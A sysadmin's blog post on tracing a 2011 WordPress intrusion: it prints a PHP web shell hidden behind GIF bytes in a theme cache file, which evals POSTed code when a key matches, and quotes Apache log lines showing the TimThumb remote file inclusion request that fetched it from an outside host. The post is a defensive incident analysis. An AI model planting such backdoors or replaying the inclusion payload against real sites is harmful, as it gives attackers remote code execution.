And the cat and mouse game goes on and on...
As I already wrote in another post 'On a hacker's trail', it's always the same story: Admin (tries) to secure system as much as possible, hackers (might) come in, admin finds hacker and fixes vulnerability, hackers (might) find other vulnerabilities.... and so on. At least it keeps me busy ;-).
This time I stumbled over a Wordpress hack which is known since August 2011 (after some research I found that information). The first hint were exceptionally many POST entries in the access log file of a virtual host. So I checked which files were created via browser (therefore uid of Apache):
# for file in $(find . -user www-data | grep .php)
> do
> ls -l $file
> done
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-admin/upd.php
-rw-r--r-- 1 www-data www-data 4 2011-08-05 17:45 ./critics/wp-content/themes/InReview/cache/external_9cb702aa084691e66c789c1e98d6233a.php
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-content/upd.php
-rw-r--r-- 1 www-data www-data 1.6K 2011-08-21 19:39 ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
-rw-r--r-- 1 www-data www-data 887 2011-10-07 20:04 ./photo/wp-content/themes/DeepFocus/cache/a31844cea72ed6c9f90b56b039bbf3f5.php
-rw-r--r-- 1 www-data www-data 15K 2011-07-20 10:59 ./photo/wp-content/w3-total-cache-config.php
There were some more files but I left out session files.
After taking a closer look at some files, I came across external_ed59d62e1b1e2167275feed65b374079.php which showed an interesting content:
# more ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
GIF89a4+÷ÀÀÀÿÿÿÿÿÿÿÿÿÿÿÿ3fÌÿ3333f33Ì3ÿff3ffffÌfÿ3...
ص
`%Á©bÒ¼#rºôùÚÒ7£Ê
ÊBjore--(58%)
Ì
ùrò¹ew¢
i7kGÏ<ý*Þ<¥³ã)ngºlpRÀM¢yÒ#Ú×úÛR/AuúII°2ë®<¡Ö~©¹éo¾hO»ÿuY³ë㬧f±½åè»ËÅ-âüÊ'nMÑSIV_¨5ÕÑVåe@'U
ç ¦âV ÔÒgãUØÑI
îùø@ûq°¥_dbYdn¹wM9¦i<ùa[il%åG·õIñfmVSç-)$`{§ÈQmd浨L-êg^ESY~Fס¶ÕVfµMÊJé\y¾Öê¸*ê¨
Ñ@YñËÔ¥yA¶P*WëßI2!$Û9¯Å¡c5ÿÕØÇA35ÚD&íôÓP«;<?php ÒVZZÚ]é°iöhFÍ ÖJ)^WÍ] Ó®
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){$Um51Å?uä%Ä5V`½
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
?>
The file starts with binary code, as if it tries to 'hide' as a non-text file, so a correct grep cannot be executed on that file:
# grep -r "eval (stripslashes" *
Binary file photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php matches
But even more interesting is the fact what happens after the binary part. The php file expects a variable '$key' via POST method. If the md5 hash of the given 'key' variable matches, then a second variable '$cmd' (also submitted by POST) will be executed on the system.
OK, so far I knew this file doesn't belong to Wordpress and it's dangerous. But how did it come on the system?
Let's take a look in the Apache logs what happened on August 21st at around 19:39 when the file was created/modified:
91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.
1; U; en) Presto/2.6.30 Version/10.62"
91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT
6.1; U; en) Presto/2.6.30 Version/10.62"
The hacker first tried to use thumb.php - but this file doesn't exist. On the second try he was successful by using timthumb.php, a php script to upload images which obviously is vulnerable.
So this is the source and this needs to be fixed.
This hack was first discovered by Mark Maunder on August 1st 2011 and he explains in a very good article how it was possible to use timthumb.php (very easy in fact!).
Another good article can be found on this page.
No comments yet.
AWS Android Ansible Apache Apple Atlassian BSD Backup Bash Bluecoat CMS Chef Cloud Coding Consul Containers CouchDB DB DNS Database Databases Docker ELK Elasticsearch Filebeat FreeBSD Galera Git GlusterFS Grafana Graphics HAProxy HTML Hacks Hardware Icinga Icingaweb Icingaweb2 Influx Internet Java KVM Kibana Kodi Kubernetes LVM LXC Linux Logstash Mac Macintosh Mail MariaDB Minio MongoDB Monitoring Multimedia MySQL NFS Nagios Network Nginx OSSEC OTRS Office PGSQL PHP Perl Personal PostgreSQL Postgres PowerDNS Proxmox Proxy Python Rancher Rant Redis Roundcube SSL Samba Seafile Security Shell SmartOS Solaris Surveillance Systemd TLS Tomcat Ubuntu Unix VMWare VMware Varnish Virtualization Windows Wireless Wordpress Wyse ZFS Zoneminder